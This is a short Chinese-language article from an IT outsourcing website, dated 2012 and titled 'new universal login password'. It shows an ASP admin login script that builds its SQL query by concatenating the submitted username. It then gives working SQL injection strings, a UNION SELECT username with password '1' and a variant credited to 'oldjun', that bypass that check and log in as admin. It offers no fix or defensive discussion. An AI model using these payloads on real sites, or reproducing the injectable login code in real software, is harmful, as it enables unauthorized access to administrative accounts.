·设为首页
·联系站长
·加入收藏
 位置: IT外包服务提供商 >> 文章频道 >> IT学堂 >> 软件学堂 >> 正文 当前没有通告!
  新型万能登录密码    3星级
新型万能登录密码
[ 作者:bianhongjin     来源:IT外包     点击数:2163     更新时间:2012-12-20     文章录入:bianhongjin
【字体: 字体颜色
 
    网上有很多这样的登陆验证代码
  <%
  username=trim(Request.Form("username"))
  password=trim(Request.Form("password"))
  sql="Select * FROM admin Where user='"&username&"'"
  Set rs=Server.CreateObject("adodb.recordset")
  rs.Open sql,conn,1,1
  if rs.eof then
  checksysUser=FALSE
  else
  passwd=trim(rs("pwd"))
  if passwd=password then
  Session("admin")=username
  checksysUser=TRUE
  else
  checksysUser=FALSE
  end if
  End if
  rs.close
  conn.close
  if checksysUser=true then
  Response.Redirect("main.asp")
  else
  errmsg="<font color=#FF0000><b>用户名输入有误,请重新输入!</b></font>"
  end if
  %>
  先在数据库中查询用户名对应的密码,然后再和用户输入的密码对比,导致'or'='or'这样的万能登陆密码失
  效.但如果在上面的程序中,用户名输入' union   select 1,1,1 FROM admin Where ''=',密码输入1,就可以登陆成功,原理很简单,就不多说了.顺便附上oldjun的语句:' union   select 1,1,1 AS pwd FROM admin Where ''=  
编辑:北京信诚www.xcitbm.com>IT保姆www.xcitbm.com>IT外包部 http://www.xcitbm.comwww.xcit.com.cn
  • 上一篇文章: 消除Windows XP中的复制乱码技巧

  • 下一篇文章: 消除Windows XP中的复制乱码技巧
  • 发表评论   告诉好友   打印此文  收藏此页  关闭窗口  返回顶部
     最新5篇热点文章
     联想固态硬盘SL700在BIOS里...
     IT外包首选我们的八大理由...
     中国劳科院与我公司续签了...
     中共中央政治局常务委员会...
     北京IT外包服务联盟知行社...
     
     最新5篇推荐文章
     0x000000ce蓝屏解决方案
     HP 706n 打印机打印A3纸的...
     什么是网络瓶颈?
     网线质量不好有什么影响?...
     蓝屏提示0x0000006B
     
     相 关 文 章

      网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
  • 这篇文章还没有任何评论。
  • ::发表评论::
    姓名:  *  Email: * 
    评分:10  20  30  40  50  60  70  80  90  100